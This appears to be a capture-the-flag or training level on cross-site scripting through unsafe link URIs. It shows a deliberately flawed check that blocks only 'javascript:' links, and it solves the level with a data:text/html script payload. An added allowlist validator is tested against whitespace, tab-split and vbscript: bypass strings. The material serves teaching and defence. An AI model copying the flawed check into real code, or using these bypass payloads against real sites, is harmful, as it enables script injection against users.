Level 7: The Unsafe URI

MISSION: The system blocks 'javascript:' links. Find another protocol to execute code when the link is clicked.

/// SOURCE CODE INSPECTOR ///

// Client-side URI routing logic
const params = new URLSearchParams(window.location.search);
const url = params.get('payload');

if (url) {
    // Flawed Validation: The developer only thought to block javascript:
    // What other URI schemes can execute code or embed HTML?
    if (url.toLowerCase().startsWith('javascript:')) {
        document.getElementById('avatar-link').href = 'about:blank';
        console.error("VIOLATION: javascript: scheme blocked.");
    } else {
        document.getElementById('avatar-link').href = url;
    }
}

/// DECRYPTION COMPLETE ///

The developer only blacklisted the javascript: pseudo-protocol, and a blacklist of one scheme is not a validation. Modern browsers also accept data: URIs that carry raw HTML: depending on the browser, the resulting document either inherits the page's context or runs as an opaque (blank) origin, but either way the embedded script executes when the link is followed, so the result is still XSS.

Payload:

data:text/html,<script>alert(1)</script>
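The fix for this level is to replace the scheme blacklist with an allowlist evaluated on the parsed URL, not on the raw string. The following is an added example (not part of the level's own code): it parses the value with the same WHATWG URL parser the browser uses to follow the link, accepts only http: and https:, and falls back to about:blank for everything else. The base URL and the sample inputs are assumptions constructed for the demo.

```javascript
// Added example, not the level's code: allowlist-based href validation.
// Parsing first matters because the URL parser strips leading/trailing
// whitespace and embedded tabs/newlines, so prefix matching on the raw
// string misses inputs the browser will still treat as javascript:.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Resolve `raw` as the browser would for a link on a page at `base`
// (base is an assumed value for the demo), then decide by scheme.
function safeHref(raw, base = 'https://example.com/') {
  if (typeof raw !== 'string') return 'about:blank';
  let parsed;
  try {
    parsed = new URL(raw, base);   // relative links resolve against base
  } catch {
    return 'about:blank';          // unparseable input is never trusted
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : 'about:blank';
}

// The level's original check, reproduced here only for comparison.
function flawedHref(raw) {
  return raw.toLowerCase().startsWith('javascript:') ? 'about:blank' : raw;
}

// Constructed inputs: legitimate links, the level's payload, and variants
// that slip past a prefix check but still parse to a scripting scheme.
const SAMPLES = [
  'https://example.com/profile',
  '/settings',
  'javascript:alert(1)',
  'data:text/html,<script>alert(1)</script>',  // the level's payload
  '  javascript:alert(1)',                      // leading whitespace
  'java\tscript:alert(1)',                      // tab removed by URL parser
  'vbscript:msgbox(1)',
];

// Returns one row per sample showing what each validator would assign.
function compare() {
  return SAMPLES.map(s => ({ input: s, flawed: flawedHref(s), safe: safeHref(s) }));
}

for (const row of compare()) console.log(JSON.stringify(row));
```

Every row where `flawed` echoes the input unchanged while `safe` yields about:blank is a bypass of the level's check; only the two http(s) samples survive the allowlist.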